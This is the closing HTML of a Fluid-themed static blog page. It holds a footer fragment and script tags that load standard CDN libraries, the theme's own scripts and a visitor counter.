          </span>
      
    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
